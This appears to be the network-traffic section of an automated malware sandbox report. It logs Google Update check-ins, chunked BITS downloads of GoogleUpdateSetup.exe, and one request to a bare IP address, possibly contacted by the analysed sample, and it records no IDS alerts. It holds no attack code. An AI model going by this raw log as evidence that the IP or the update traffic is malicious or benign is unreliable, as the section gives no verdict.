Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked

POST https://update.googleapis.com/service/update2 -> 200
POST /service/update2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.36.72;winhttp
X-Old-UID: cnt=0
X-Goog-Update-Updater: Omaha-1.3.36.72
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 785
Host: update.googleapis.com
HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-Lj5ORRH/+PCHe7uGKAJ+QA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Apr 2021 04:22:47 GMT
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5207
X-Daystart: 76967
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked

GET http://203.159.80.228/ -> 200
GET / HTTP/1.1
Host: 203.159.80.228
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:21:19 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.2
Last-Modified: Tue, 30 Mar 2021 16:04:04 GMT
ETag: "1f-5bec325bb5626"
Accept-Ranges: bytes
Content-Length: 31
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

HEAD http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe -> 200
HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 200 OK
accept-ranges: bytes
content-disposition: attachment
content-length: 1304160
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3117
cache-control: public,max-age=3600

GET http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe -> 206
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=0-4813
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 4814
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3142
content-range: bytes 0-4813/1304160
cache-control: public,max-age=3600

GET http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe -> 206
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=4814-18412
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 13599
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3149
content-range: bytes 4814-18412/1304160
cache-control: public,max-age=3600

GET http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe -> 206
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=18413-29842
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 11430
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3157
content-range: bytes 18413-29842/1304160
cache-control: public,max-age=3600

GET http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe -> 206
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=29843-41274
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 11432
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3162
content-range: bytes 29843-41274/1304160
cache-control: public,max-age=3600

GET http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe -> 206
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=41275-51227
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 9953
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3176
content-range: bytes 41275-51227/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=51228-67422
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 16195
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3177
content-range: bytes 51228-67422/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=67423-88386
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 20964
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3178
content-range: bytes 67423-88386/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=88387-151561
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 63175
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3179
content-range: bytes 88387-151561/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=151562-283433
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 131872
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3180
content-range: bytes 151562-283433/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=283434-544245
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 260812
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3181
content-range: bytes 283434-544245/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=544246-1064661
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 520416
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3182
content-range: bytes 544246-1064661/1304160
cache-control: public,max-age=3600
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=1064662-1304159
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 239498
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 05 Apr 2021 03:29:32 GMT
age: 3183
content-range: bytes 1064662-1304159/1304160
cache-control: public,max-age=3600
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts